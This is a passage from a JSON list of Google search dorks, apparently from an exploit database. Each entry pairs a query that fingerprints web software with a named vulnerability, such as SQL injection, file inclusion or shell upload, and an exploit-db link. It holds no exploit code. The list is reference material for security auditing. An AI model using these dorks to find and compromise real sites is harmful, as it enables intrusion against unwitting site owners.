"submited": "2010-11-15", "request": "inurl:\"com_jcalpro\"", "id": 2689}, {"short description": "Powered by Webiz", "long description": "(Webiz) local SHELL Upload Vulnerability: http://www.exploit-db.com/exploits/12797", "submited": "2010-11-15", "request": "Powered by Webiz", "id": 2690}, {"short description": "inurl:category.php?cate_id=", "long description": "GC Auction Platinum (cate_id) Remote SQL Injection Vulnerability - CVE: 2008-3413: http://www.exploit-db.com/exploits/6144", "submited": "2010-11-15", "request": "inurl:category.php?cate_id=", "id": 2691}, {"short description": "CaLogic Calendars V1.2.2", "long description": "CaLogic Calendars 1.2.2 (CLPath) Remote File Include Vulnerabilities - CVE: 2006-2570: http://www.exploit-db.com/exploits/1809", "submited": "2010-11-15", "request": "CaLogic Calendars V1.2.2", "id": 2693}, {"short description": "Copyright 2008 Free Image & File Hosting", "long description": "Free Image & File Hosting Upload Vulnerability: http://www.exploit-db.com/exploits/12105", "submited": "2010-11-15", "request": "Copyright 2008 Free Image & File Hosting", "id": 2694}, {"short description": "\"PHP Gallery 2010 PHP Weby hostgator coupon\"", "long description": "Free PHP photo gallery script Remote File inclusion Vulnerability: http://www.exploit-db.com/exploits/14438", "submited": "2010-11-15", "request": "\"PHP Gallery 2010 PHP Weby hostgator coupon\"", "id": 2695}, {"short description": "\"Powered by Rock Band CMS 0.10\"", "long description": "BandCMS 0.10 news.php Multiple SQL Injection Vulnerabilities - CVE: 2009-3252: http://www.exploit-db.com/exploits/9553", "submited": "2010-11-15", "request": "\"Powered by Rock Band CMS 0.10\"", "id": 2696}, {"short description": "Copyright Acme 2008", "long description": "AJ HYIP ACME (news.php id) Remote SQL Injection Vulnerability - CVE: 2008-2893: http://www.exploit-db.com/exploits/5890", "submited": "2010-11-15", "request": "Copyright Acme 2008", "id": 2698}, {"short description": 
"\"Send amazing greetings to your friends and relative!\"", "long description": "Greeting card SQL Injection Vulnerability: http://www.exploit-db.com/exploits/13983", "submited": "2010-11-15", "request": "\"Send amazing greetings to your friends and relative!\"", "id": 2699}, {"short description": "\"Creative Guestbook\"", "long description": "Creative Guestbook 1.0 Multiple Remote Vulnerabilities - CVE: 2007-1479: http://www.exploit-db.com/exploits/3489", "submited": "2010-11-15", "request": "\"Creative Guestbook\"", "id": 2700}, {"short description": "\"DeeEmm CMS\"", "long description": "DeeEmm CMS (DMCMS) 0.7.4 Multiple Remote Vulnerabilities - CVE: 2008-3721: http://www.exploit-db.com/exploits/6250", "submited": "2010-11-15", "request": "\"DeeEmm CMS\"", "id": 2701}, {"short description": "\"PHP Gallery 2010 PHP Weby hostgator coupon\"", "long description": "ValidForm Builder script Remote Command Execution Vulnerability: http://www.exploit-db.com/exploits/14454", "submited": "2010-11-15", "request": "\"PHP Gallery 2010 PHP Weby hostgator coupon\"", "id": 2702}, {"short description": "powered by vBulletin 4.0.4", "long description": "VBbuletin 4.0.4 Multiple Vulnerabilities: http://www.exploit-db.com/exploits/14686", "submited": "2010-11-15", "request": "powered by vBulletin 4.0.4", "id": 2703}, {"short description": "Copyright 2007 Agares Media. Powered by AMCMS3.", "long description": "Arcadem Pro (articlecat) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/6624", "submited": "2010-11-15", "request": "Copyright 2007 Agares Media. 
Powered by AMCMS3.", "id": 2704}, {"short description": "\"Vivid Ads Shopping Cart\"", "long description": "Vivid Ads Shopping Cart (prodid) Remote SQL Injection: http://www.exploit-db.com/exploits/10297", "submited": "2010-11-15", "request": "\"Vivid Ads Shopping Cart\"", "id": 2705}, {"short description": "inurl:\"/rbfminc/\"", "long description": "RogioBiz_PHP_file_manager_V1.2 bypass admin: http://www.exploit-db.com/exploits/11731", "submited": "2010-11-15", "request": "inurl:\"/rbfminc/\"", "id": 2706}, {"short description": "intext:Powered by AWCM v2.1", "long description": "AWCM 2.1 Local File Inclusion / Auth Bypass Vulnerabilities - CVE: 2009-3219: http://www.exploit-db.com/exploits/9237", "submited": "2010-11-15", "request": "intext:Powered by AWCM v2.1", "id": 2707}, {"short description": "inurl:\"lista_articulos.php?id_categoria=\"", "long description": "SitioOnline SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10453", "submited": "2010-11-15", "request": "inurl:\"lista_articulos.php?id_categoria=\"", "id": 2709}, {"short description": "\"Powered By AlstraSoft AskMe Pro\"", "long description": "AlstraSoft AskMe Pro 2.1 Multiple SQL Injection Vulnerabilities - CVE: 2008-2902: http://www.exploit-db.com/exploits/5821", "submited": "2010-11-15", "request": "\"Powered By AlstraSoft AskMe Pro\"", "id": 2710}, {"short description": "allinurl:\"com_neogallery\"", "long description": "Joomla Component NeoGallery 1.1 SQL Injection Vulnerability - CVE: 2008-0752: http://www.exploit-db.com/exploits/5083", "submited": "2010-11-15", "request": "allinurl:\"com_neogallery\"", "id": 2711}, {"short description": "inurl:\"com_category\"", "long description": "Joomla Component com_category (catid) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/9126", "submited": "2010-11-15", "request": "inurl:\"com_category\"", "id": 2712}, {"short description": "\"Powered By Zoopeer\"", "long description": "Zoopeer 0.1 & 0.2 (fckeditor) Shell Upload 
Vulnerability: http://www.exploit-db.com/exploits/15354", "submited": "2010-11-15", "request": "\"Powered By Zoopeer\"", "id": 2713}, {"short description": "inurl:index.php?ortupg=", "long description": "CMS Ortus 1.13 Remote SQL Injection Vulnerability - CVE: 2008-6282: http://www.exploit-db.com/exploits/7237", "submited": "2010-11-15", "request": "inurl:index.php?ortupg=", "id": 2714}, {"short description": "inurl:com_jomtube", "long description": "Joomla Component com_jomtube (user_id) Blind SQL Injection / SQL Injection: http://www.exploit-db.com/exploits/14434", "submited": "2010-11-15", "request": "inurl:com_jomtube", "id": 2715}, {"short description": "\"Powered by web directory script\"", "long description": "Web Directory Script 1.5.3 (site) SQL Injection Vulnerability - CVE: 2008-4091: http://www.exploit-db.com/exploits/6335", "submited": "2010-11-15", "request": "\"Powered by web directory script\"", "id": 2716}, {"short description": "inurl:com_gigcal", "long description": "Joomla Component com_gigcal (gigcal_gigs_id) SQL Injection Vuln - CVE: 2009-0726: http://www.exploit-db.com/exploits/7746", "submited": "2010-11-15", "request": "inurl:com_gigcal", "id": 2717}, {"short description": "Powered MarketSaz", "long description": "MarketSaz remote file Upload Vulnerability: http://www.exploit-db.com/exploits/13927", "submited": "2010-11-15", "request": "Powered MarketSaz", "id": 2718}, {"short description": "\"PHPWebAdmin for hMailServer\" intitle:PHPWebAdmin -site:hmailserver.com", "long description": "hMAilServer 4.4.2 (PHPWebAdmin) File Inclusion Vulnerabilities: http://www.exploit-db.com/exploits/7012", "submited": "2010-11-15", "request": "\"PHPWebAdmin for hMailServer\" intitle:PHPWebAdmin -site:hmailserver.com", "id": 2719}, {"short description": "inurl:com_ezautos", "long description": "Joomla Component (com_ezautos) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/15085", "submited": "2010-11-15", "request": "inurl:com_ezautos", 
"id": 2720}, {"short description": "\"Designed & Developed by Zeeways.com\"", "long description": "zeeproperty 1.0 (Upload/XSS) Multiple Remote Vulnerabilities - CVE: 2008-6915: http://www.exploit-db.com/exploits/7058", "submited": "2010-11-15", "request": "\"Designed & Developed by Zeeways.com\"", "id": 2721}, {"short description": "inurl:option=com_education_classes", "long description": "joomla component education SQL injection Vulnerability: http://www.exploit-db.com/exploits/12153", "submited": "2010-11-15", "request": "inurl:option=com_education_classes", "id": 2722}, {"short description": "allinurl:\"lyrics_menu/lyrics_song.php?l_id=\"", "long description": "e107 Plugin lyrics_menu (lyrics_song.php l_id) SQL Injection Vulnerability - CVE: 2008-4906: http://www.exploit-db.com/exploits/6885", "submited": "2010-11-15", "request": "allinurl:\"lyrics_menu/lyrics_song.php?l_id=\"", "id": 2723}, {"short description": "infusions/recept/recept.php?", "long description": "PHP-Fusion Mod recept (kat_id) SQL Injection Vulnerability - CVE: 2008-4527: http://www.exploit-db.com/exploits/6683", "submited": "2010-11-15", "request": "infusions/recept/recept.php?", "id": 2726}, {"short description": "Copyright 2010 My Hosting. All rights reserved", "long description": "Hosting-php-dynamic (Auth Bypass) Vulnerability: http://www.exploit-db.com/exploits/11968", "submited": "2010-11-15", "request": "Copyright 2010 My Hosting. 
All rights reserved", "id": 2727}, {"short description": "\"Powered By diskos\"", "long description": "Diskos CMS Manager (SQL/DB/Auth Bypass) Multiple Vulnerabilities - CVE: 2009-4798: http://www.exploit-db.com/exploits/8307", "submited": "2010-11-15", "request": "\"Powered By diskos\"", "id": 2729}, {"short description": "Copyright 2006 Flax Article Manager v1.1", "long description": "Flax Article Manager 1.1 (cat_id) SQL Injection Vulnerability - CVE: 2009-0284: http://www.exploit-db.com/exploits/7862", "submited": "2010-11-15", "request": "Copyright 2006 Flax Article Manager v1.1", "id": 2732}, {"short description": "Powered by PHP Image Gallery", "long description": "SoftComplex PHP Image Gallery 1.0 (Auth Bypass) SQL Injection Vuln - CVE: 2008-6488: http://www.exploit-db.com/exploits/7021", "submited": "2010-11-15", "request": "Powered by PHP Image Gallery", "id": 2734}, {"short description": "Powered By Pligg | Legal: License and Source", "long description": "Pligg CMS 9.9.0 (story.php id) Remote SQL Injection Vulnerability - CVE: 2008-3366: http://www.exploit-db.com/exploits/6146", "submited": "2010-11-15", "request": "Powered By Pligg | Legal: License and Source", "id": 2736}, {"short description": "\"PHP Gallery 2010 PHP Weby hostgator coupon\"", "long description": "Free PHP photo gallery script Remote Command Execution Vulnerability: http://www.exploit-db.com/exploits/14437", "submited": "2010-11-15", "request": "\"PHP Gallery 2010 PHP Weby hostgator coupon\"", "id": 2737}, {"short description": "inurl:/_blogadata/", "long description": "Blogator-script 0.95 Change User Password Vulnerability - CVE: 2008-6473: http://www.exploit-db.com/exploits/5370", "submited": "2010-11-15", "request": "inurl:/_blogadata/", "id": 2738}, {"short description": "\"index.php?option=com_chronocontact\" / \"com_chronocontact\"", "long description": "Joomla Component ChronoForms (com_chronocontact): http://www.exploit-db.com/exploits/12843", "submited": "2010-11-15", 
"request": "\"index.php?option=com_chronocontact\" / \"com_chronocontact\"", "id": 2739}, {"short description": "inurl:\"com_a6mambocredits\"", "long description": "Mambo a6mambocredits Component 1.0.0 File Include Vulnerability - CVE: 2006-4288: http://www.exploit-db.com/exploits/2207", "submited": "2010-11-15", "request": "inurl:\"com_a6mambocredits\"", "id": 2741}, {"short description": "\"index.php?id_menu=\" CMScontrol", "long description": "CMScontrol (Content Management Portal Solutions) Sql Injection - CVE: 2009-3326: http://www.exploit-db.com/exploits/9727", "submited": "2010-11-15", "request": "\"index.php?id_menu=\" CMScontrol", "id": 2742}, {"short description": "inurl:\"com_eventcal\"", "long description": "Joomla eventcal Component 1.6.4 com_eventcal Blind SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14187", "submited": "2010-11-15", "request": "inurl:\"com_eventcal\"", "id": 2743}, {"short description": "\"and Powered By :Sansak\"", "long description": "WebBoard 2.0 Arbitrary SQL Question/Anwser Delete Vulnerability: http://www.exploit-db.com/exploits/6303", "submited": "2010-11-15", "request": "\"and Powered By :Sansak\"", "id": 2744}, {"short description": "inurl:profile.php?mode=", "long description": "PHPBB MOD [2.0.19] Invitation Only (PassCode Bypass vulnerability): http://www.exploit-db.com/exploits/14440", "submited": "2010-11-15", "request": "inurl:profile.php?mode=", "id": 2746}, {"short description": "Powered By SalSa Creations", "long description": "ClipShare Pro 2006-2007 (chid) SQL Injection Vulnerability - CVE: 2008-5489: http://www.exploit-db.com/exploits/7128", "submited": "2010-11-15", "request": "Powered By SalSa Creations", "id": 2747}, {"short description": "inurl:modules.php?op= \"pollID\"", "long description": "MD-Pro 1.083.x Survey Module (pollID) Blind SQL Injection Vulnerability - CVE: 2009-2618: http://www.exploit-db.com/exploits/9021", "submited": "2010-11-15", "request": "inurl:modules.php?op= 
\"pollID\"", "id": 2748}, {"short description": "\"Powered by SazCart\"", "long description": "SazCart 1.5.1 (prodid) Remote SQL Injection - CVE: 2008-2411: http://www.exploit-db.com/exploits/5576", "submited": "2010-11-15", "request": "\"Powered by SazCart\"", "id": 2749}, {"short description": "intext:\"Powered by Max.Blog\"", "long description": "Max.Blog 1.0.6 (offline_auth.php) Offline Authentication Bypass - CVE: 2009-0409: http://www.exploit-db.com/exploits/7899", "submited": "2010-11-15", "request": "intext:\"Powered by Max.Blog\"", "id": 2750}, {"short description": "\"Powered by CMSimple\"", "long description": "CMSimple 3.1 Local File Inclusion / Arbitrary File Upload - CVE: 2008-2650: http://www.exploit-db.com/exploits/5700", "submited": "2010-11-15", "request": "\"Powered by CMSimple\"", "id": 2751}, {"short description": "inurl:\"com_performs\"", "long description": "perForms Mambo Component 1.0 Remote File Inclusion - CVE: 2006-3774: http://www.exploit-db.com/exploits/2025", "submited": "2010-11-15", "request": "inurl:\"com_performs\"", "id": 2752}, {"short description": "inurl:\"com_mambowiki\"", "long description": "Mambo MamboWiki Component 0.9.6 Remote Include Vulnerability - CVE: 2006-4282: http://www.exploit-db.com/exploits/2213", "submited": "2010-11-15", "request": "inurl:\"com_mambowiki\"", "id": 2753}, {"short description": "index.asp?archivio=OK", "long description": "Ublog access version Arbitrary Database Disclosure: http://www.exploit-db.com/exploits/8610", "submited": "2010-11-15", "request": "index.asp?archivio=OK", "id": 2754}, {"short description": "album.asp?pic= .jpg cat=", "long description": "aspWebAlbum 3.2 Multiple Remote Vulnerabilities - CVE: 2008-6977: http://www.exploit-db.com/exploits/6420", "submited": "2010-11-15", "request": "album.asp?pic= .jpg cat=", "id": 2755}, {"short description": "\"Multi-Page Comment System\"", "long description": "Multi-Page Comment System 1.1.0 Insecure Cookie Handling Vulnerability - CVE: 
2008-2293: http://www.exploit-db.com/exploits/5630", "submited": "2010-11-15", "request": "\"Multi-Page Comment System\"", "id": 2757}, {"short description": "inurl:\"com_wmtpic\"", "long description": "Joomla Component com_wmtpic 1.0 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14128", "submited": "2010-11-15", "request": "inurl:\"com_wmtpic\"", "id": 2759}, {"short description": "inurl:index.php?mode=game_player", "long description": "Tycoon CMS Record Script SQL Injection Vulnerability - CVE: 2010-3027: http://www.exploit-db.com/exploits/14572", "submited": "2010-11-15", "request": "inurl:index.php?mode=game_player", "id": 2760}, {"short description": "\"pages.php?page_ID=\" \"K9 Kreativity\"", "long description": "K9 Kreativity Design (pages.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12866", "submited": "2010-11-15", "request": "\"pages.php?page_ID=\" \"K9 Kreativity\"", "id": 2761}, {"short description": "album.asp?pic= .jpg cat=", "long description": "aspWebAlbum 3.2 (Upload/SQL/XSS) Multiple Remote Vulnerabilities - CVE: 2008-6977: http://www.exploit-db.com/exploits/6357", "submited": "2010-11-15", "request": "album.asp?pic= .jpg cat=", "id": 2763}, {"short description": "inurl:\"option=com_simpleshop\" & inurl:\"viewprod\"", "long description": "Joomla SimpleShop Component (com_simpleshop) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14501", "submited": "2010-11-15", "request": "inurl:\"option=com_simpleshop\" & inurl:\"viewprod\"", "id": 2764}, {"short description": "intext:\"Powered by Community CMS\"", "long description": "Community CMS 0.5 Multiple SQL Injection Vulnerabilities - CVE: 2009-4794: http://www.exploit-db.com/exploits/8323", "submited": "2010-11-15", "request": "intext:\"Powered by Community CMS\"", "id": 2765}, {"short description": "\"Powered by Scallywag\"", "long description": "Scallywag (template.php path) Remote File Inclusion Vulnerabilities - CVE: 2007-2900: 
http://www.exploit-db.com/exploits/3972", "submited": "2010-11-15", "request": "\"Powered by Scallywag\"", "id": 2766}, {"short description": "inurl:\"phshoutbox.php\"", "long description": "PhShoutBox 1.5 (final) Insecure Cookie Handling Vulnerability - CVE: 2008-1971: http://www.exploit-db.com/exploits/5467", "submited": "2010-11-15", "request": "inurl:\"phshoutbox.php\"", "id": 2767}, {"short description": "\"index.php?option=com_seyret\" / \"com_seyret\"", "long description": "Joomla Component Seyret (com_seyret) - Local File Inclusion Vulnerability: http://www.exploit-db.com/exploits/14183", "submited": "2010-11-15", "request": "\"index.php?option=com_seyret\" / \"com_seyret\"", "id": 2769}, {"short description": "inurl:inc_memberdirectorymanager.asp", "long description": "DMXReady Member Directory Manager 1.1 SQL Injection Vulnerability - CVE: 2009-0427: http://www.exploit-db.com/exploits/7773", "submited": "2010-11-15", "request": "inurl:inc_memberdirectorymanager.asp", "id": 2770}, {"short description": "inurl:\"mod=notizie\"", "long description": "XCMS 1.83 Remote Command Execution - CVE: 2007-6652: http://www.exploit-db.com/exploits/4813", "submited": "2010-11-15", "request": "inurl:\"mod=notizie\"", "id": 2771}, {"short description": "\"Powered By ScozNews\"", "long description": "ScozNews 1.2.1 (mainpath) Remote File Inclusion Vulnerability - CVE: 2006-2487: http://www.exploit-db.com/exploits/1800", "submited": "2010-11-15", "request": "\"Powered By ScozNews\"", "id": 2772}, {"short description": "\"PHP BP Team\"", "long description": "phpBP RC3 (2.204) FIX4 Remote SQL Injection Vulnerability - CVE: 2008-1408: http://www.exploit-db.com/exploits/5263", "submited": "2010-11-15", "request": "\"PHP BP Team\"", "id": 2774}, {"short description": "inurl:\"picture.php?cat=\" \"Powered by PhpWebGallery 1.3.4\"", "long description": "PhpWebGallery 1.3.4 (XSS/LFI) Multiple Vulnerabilities - CVE: 2008-4591: http://www.exploit-db.com/exploits/6425", "submited": 
"2010-11-15", "request": "inurl:\"picture.php?cat=\" \"Powered by PhpWebGallery 1.3.4\"", "id": 2775}, {"short description": "inurl:\"zcat.php?id=\"", "long description": "IRAN N.E.T E-commerce Group SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10350", "submited": "2010-11-15", "request": "inurl:\"zcat.php?id=\"", "id": 2776}, {"short description": "inurl:K-Search, Powered By K-Search", "long description": "K-Search (SQL/XSS) Multiple Remote Vulnerabilities - CVE: 2010-2457: http://www.exploit-db.com/exploits/13993", "submited": "2010-11-15", "request": "inurl:K-Search, Powered By K-Search", "id": 2777}, {"short description": "\"index.php?option=com_chronoconnectivity\" / \"com_chronoconnectivity\"", "long description": "Joomla Component ChronoConnectivity: http://www.exploit-db.com/exploits/12842", "submited": "2010-11-15", "request": "\"index.php?option=com_chronoconnectivity\" / \"com_chronoconnectivity", "id": 2778}, {"short description": "Powered by cP Creator v2.7.1", "long description": "cP Creator v2.7.1 Remote Sql Injection - CVE: 2009-3330: http://www.exploit-db.com/exploits/9726", "submited": "2010-11-15", "request": "Powered by cP Creator v2.7.1", "id": 2781}, {"short description": "inurl:\"com_mscomment\"", "long description": "Joomla Component MS Comment LFI Vulnerability - CVE: 2010-2050: http://www.exploit-db.com/exploits/12611", "submited": "2010-11-15", "request": "inurl:\"com_mscomment\"", "id": 2782}, {"short description": "Powered by Mitra Informatika Solusindo", "long description": "Mitra Informatika Solusindo cart Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5214", "submited": "2010-11-15", "request": "Powered by Mitra Informatika Solusindo", "id": 2784}, {"short description": "2009 Satellite-X", "long description": "Satellite-X 4.0 (Auth Bypass) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11962", "submited": "2010-11-15", "request": "2009 Satellite-X", "id": 2785}, {"short 
description": "\"Powered by bSpeak 1.10\"", "long description": "bSpeak 1.10 (forumid) Remote Blind SQL Injection Vulnerability - CVE: 2009-1747: http://www.exploit-db.com/exploits/8751", "submited": "2010-11-15", "request": "\"Powered by bSpeak 1.10\"", "id": 2787}, {"short description": "Powered by osCommerce", "long description": "osCommerce Online Merchant 2.2 RC2a Code Execution: http://www.exploit-db.com/exploits/9556", "submited": "2010-11-15", "request": "Powered by osCommerce", "id": 2789}, {"short description": "inurl:choosecard.php?catid=", "long description": "post Card ( catid ) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11892", "submited": "2010-11-15", "request": "inurl:choosecard.php?catid=", "id": 2790}, {"short description": "inurl:\"com_jphoto\"", "long description": "Joomla Component com_jphoto SQL Injection Vulnerability - (id) - CVE: 2009-4598: http://www.exploit-db.com/exploits/10367", "submited": "2010-11-15", "request": "inurl:\"com_jphoto\"", "id": 2791}, {"short description": "allinurl: e107_plugins/easyshop/easyshop.php", "long description": "e107 Plugin EasyShop (category_id) Blind SQL Injection - CVE: 2008-4786: http://www.exploit-db.com/exploits/6852", "submited": "2010-11-15", "request": "allinurl: e107_plugins/easyshop/easyshop.php", "id": 2792}, {"short description": "inurl:\"com_koesubmit\"", "long description": "Mambo com_koesubmit 1.0.0 Remote File Inclusion - CVE: 2009-3333: http://www.exploit-db.com/exploits/9714", "submited": "2010-11-15", "request": "inurl:\"com_koesubmit\"", "id": 2793}, {"short description": "Powered by PHP Advanced Transfer Manager v1.10 - @2002 Bugada Andrea", "long description": "PHP Advanced Transfer Manager v1.10 Shell Upload Vulnerability: http://www.exploit-db.com/exploits/11613", "submited": "2010-11-15", "request": "Powered by PHP Advanced Transfer Manager v1.10 - @2002 Bugada Andrea", "id": 2794}, {"short description": "inurl:add_soft.php", "long description": 
"Hotscripts Clone (cid) Remote SQL Injection Vulnerability - CVE: 2008-6405: http://www.exploit-db.com/exploits/6545", "submited": "2010-11-15", "request": "inurl:add_soft.php", "id": 2795}, {"short description": "\"Powered by Absolute Podcast\"", "long description": "Absolute Podcast 1.0 Remote Insecure Cookie Handling Vulnerability - CVE: 2008-6857: http://www.exploit-db.com/exploits/6882", "submited": "2010-11-15", "request": "\"Powered by Absolute Podcast\"", "id": 2796}, {"short description": "Powered by iScripts EasyBiller", "long description": "iScripts easybiller v1.1 sqli vulnerability: http://www.exploit-db.com/exploits/13741", "submited": "2010-11-15", "request": "Powered by iScripts EasyBiller", "id": 2797}, {"short description": "\"Copyright-2008@zeejobsite.com\"", "long description": "ZEEJOBSITE 2.0 Remote File Upload Vulnerability - CVE: 2008-6913: http://www.exploit-db.com/exploits/7062", "submited": "2010-11-15", "request": "\"Copyright-2008@zeejobsite.com\"", "id": 2798}, {"short description": "\"Powered By phpCOIN v1.2.1\" / \"mod.php?mod=faq\"", "long description": "phpCOIN 1.2.1 (mod.php) LFI Vulnerability - CVE: 2010-0953: http://www.exploit-db.com/exploits/11641", "submited": "2010-11-15", "request": "\"Powered By phpCOIN v1.2.1\" / \"mod.php?mod=faq\"", "id": 2799}, {"short description": "inurl:\"index.php?option=com_jp_jobs\"", "long description": "Joomla component jp_jobs SQL Injection Vulnerability - CVE: 2010-1350: http://www.exploit-db.com/exploits/12037", "submited": "2010-11-15", "request": "inurl:\"index.php?option=com_jp_jobs\"", "id": 2800}, {"short description": "allinurl: Category.php?IndustrYID=", "long description": "CmS (id) SQL Injection Vulnerability - CVE: 2009-2439: http://www.exploit-db.com/exploits/12333", "submited": "2010-11-15", "request": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allinurl:+Category.php%3FIndustrYID%3D", "id": 2801}, {"short description": "index2.php?option=com_joomlaboard", "long 
description": "Joomla Component Joomlaboard 1.1.1 (sbp) RFI Vulnerability: http://www.exploit-db.com/exploits/3560", "submited": "2010-11-15", "request": "index2.php?option=com_joomlaboard", "id": 2802}, {"short description": "intext:\"Powered By WorldPay\" inurl:productdetail.php", "long description": "WorldPay Script Shop (productdetail) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10976", "submited": "2010-11-15", "request": "intext:\"Powered By WorldPay\" inurl:productdetail.php", "id": 2803}, {"short description": "inurl:\"cameralife/index.php\"", "long description": "Camera Life 2.6.2b4 (SQL/XSS) Multiple Remote Vulnerabilities - CVE: 2008-6087: http://www.exploit-db.com/exploits/6710", "submited": "2010-11-15", "request": "inurl:\"cameralife/index.php\"", "id": 2804}, {"short description": "inurl:option=com_huruhelpdesk", "long description": "joomla component allvideos BLIND SQL injection Vulnerability: http://www.exploit-db.com/exploits/12137", "submited": "2010-11-15", "request": "inurl:option=com_huruhelpdesk", "id": 2805}, {"short description": "inurl:inc_membersareamanager.asp", "long description": "DMXReady Members Area Manager 1.2 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/7774", "submited": "2010-11-15", "request": "inurl:inc_membersareamanager.asp", "id": 2806}, {"short description": "\"Tanyakan Pada Rumput Yang Bergoyang\"", "long description": "Moa Gallery 1.2.0 Multiple Remote File Inclusion Vulnerabilities - CVE: 2009-4614: http://www.exploit-db.com/exploits/9522", "submited": "2010-11-15", "request": "\"Tanyakan Pada Rumput Yang Bergoyang\"", "id": 2807}, {"short description": "inurl:/component/jesectionfinder/", "long description": "Joomla Component JE Section Finder LFI Vulnerability - CVE: 2010-2680: http://www.exploit-db.com/exploits/14064", "submited": "2010-11-15", "request": "inurl:/component/jesectionfinder/", "id": 2808}, {"short description": "intitle:phpMyAdmin", "long description": "phpMyAdmin 
Code Injection RCE - CVE: 2009-1151: http://www.exploit-db.com/exploits/8992", "submited": "2010-11-15", "request": "intitle:phpMyAdmin", "id": 2809}, {"short description": "inurl:\"com_phocagallery\"", "long description": "Joomla Phoca Gallery Component (com_phocagallery) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14207", "submited": "2010-11-15", "request": "inurl:\"com_phocagallery\"", "id": 2810}, {"short description": "inurl:\"member.php?page=comments\"", "long description": "6ALBlog (newsid) Remote SQL Injection Vulnerability - CVE: 2007-3451: http://www.exploit-db.com/exploits/4104", "submited": "2010-11-15", "request": "inurl:\"member.php?page=comments\"", "id": 2811}, {"short description": "''webboard question.asp QID''", "long description": "PORAR WEBBOARD (question.asp) Remote SQL Injection Vulnerability - CVE: 2008-1039: http://www.exploit-db.com/exploits/5185", "submited": "2010-11-15", "request": "''webboard question.asp QID''", "id": 2812}, {"short description": "inurl:\"index.php?option=com_ponygallery\"", "long description": "Joomla Component Pony Gallery 1.5 SQL Injection Vulnerability - CVE: 2007-4046: http://www.exploit-db.com/exploits/4201", "submited": "2010-11-15", "request": "inurl:\"index.php?option=com_ponygallery\"", "id": 2815}, {"short description": "inurl:\"com_dbquery\" OR \"index.php?option=com_dbquery\"", "long description": "Joomla Component DBQuery 1.4.1.1 RFI Vulnerability - CVE: 2008-6841: http://www.exploit-db.com/exploits/6003/", "submited": "2010-11-15", "request": "inurl:\"com_dbquery\" OR \"index.php?option=com_dbquery\"", "id": 2816}, {"short description": "Powered by Discuz! 1.0 2002, Crossday Studio of 11cn.org", "long description": "Discuz 1.03 SQL Injection Exploit Vulnerability: http://www.exploit-db.com/exploits/10861", "submited": "2010-11-15", "request": "Powered by Discuz! 1.0 2002, Crossday Studio of 11cn.org", "id": 2817}, {"short description": "Power by donghungx. Copyright 2008 AttMp3.com. 
All rights reserved.", "long description": "SongForever.com Clone Shell Upload Vulnerability: http://www.exploit-db.com/exploits/11476", "submited": "2010-11-15", "request": "Power by donghungx. Copyright 2008 AttMp3.com. All rights reserved.", "id": 2818}, {"short description": "\"PowerMovieList 0.14 Beta Copyright\"", "long description": "PowerMovieList 0.14b (SQL/XSS) Multiple Remote Vulnerabilities: http://www.exploit-db.com/exploits/8062", "submited": "2010-11-15", "request": "\"PowerMovieList 0.14 Beta Copyright\"", "id": 2821}, {"short description": "\"powered by MODx\"", "long description": "MODx CMS 0.9.2.1 (FCKeditor) Remote File Include Vulnerability - CVE: 2006-5730: http://www.exploit-db.com/exploits/2706/", "submited": "2010-11-15", "request": "\"powered by MODx\"", "id": 2822}, {"short description": "\"Powered by words tag script\"", "long description": "Words tag script 1.2 (word) Remote SQL Injection Vulnerability - CVE: 2008-3945: http://www.exploit-db.com/exploits/6336", "submited": "2010-11-15", "request": "\"Powered by words tag script\"", "id": 2824}, {"short description": "\"Powered by osCMax v2.0\" , \"Copyright @\" \"RahnemaCo.com\"", "long description": "osCMax 2.0 (fckeditor) Remote File Upload: http://www.exploit-db.com/exploits/11771", "submited": "2010-11-15", "request": "\"Powered by osCMax v2.0\" , \"Copyright @\" \"RahnemaCo.com\"", "id": 2825}, {"short description": "FrontAccounting", "long description": "FrontAccounting 1.12 Build 31 Remote File Inclusion Vulnerability - CVE: 2007-4279: http://www.exploit-db.com/exploits/4269", "submited": "2010-11-15", "request": "FrontAccounting", "id": 2827}, {"short description": "Powered by Egorix", "long description": "EPOLL SYSTEM 3.1 (password.dat) Disclosure: http://www.exploit-db.com/exploits/7864", "submited": "2010-11-15", "request": "Powered by Egorix", "id": 2828}, {"short description": "intext:\"Free Ecommerce Shopping Cart Software by ViArt\" +\"Your shopping cart is empty!\" + 
\"Products Search\" +\"Advanced Search\" + \"All Categories\"", "long description": "ViArt Shopping Cart 3.5 Multiple Remote Vulnerabilities - CVE: 2008-6758: http://www.exploit-db.com/exploits/7628", "submited": "2010-11-15", "request": "intext:\"Free Ecommerce Shopping Cart Software by ViArt\" +\"Your shopping cart is empty!\" + \"Products Search\" +\"Advanced Search\" + \"All Categories\"", "id": 2830}, {"short description": "\"powered by WonderEdit Pro\"", "long description": "WonderEdit Pro CMS (template_path) Remote File Include Vulnerabilities - CVE: 2006-3422: http://www.exploit-db.com/exploits/1982", "submited": "2010-11-15", "request": "\"powered by WonderEdit Pro\"", "id": 2831}, {"short description": "inurl:\"kgb19\"", "long description": "KGB 1.9 (sesskglogadmin.php) Local File Include - CVE: 2007-0337: http://www.exploit-db.com/exploits/3134", "submited": "2010-11-15", "request": "inurl:\"kgb19\"", "id": 2833}, {"short description": "allinurl:buyer/index.php?ProductID=", "long description": "Alibaba Clone Platinum (buyer/index.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12609", "submited": "2010-11-15", "request": "allinurl:buyer/index.php?ProductID=", "id": 2834}, {"short description": "\"powered by Sitellite\"", "long description": "Sitellite CMS 4.2.12 (559668.php) Remote File Inclusion Vulnerability - CVE: 2007-3228: http://www.exploit-db.com/exploits/4071", "submited": "2010-11-15", "request": "\"powered by Sitellite\"", "id": 2835}, {"short description": "\"PHP Link Portal v1.95.1 Big Resources, Inc.\"", 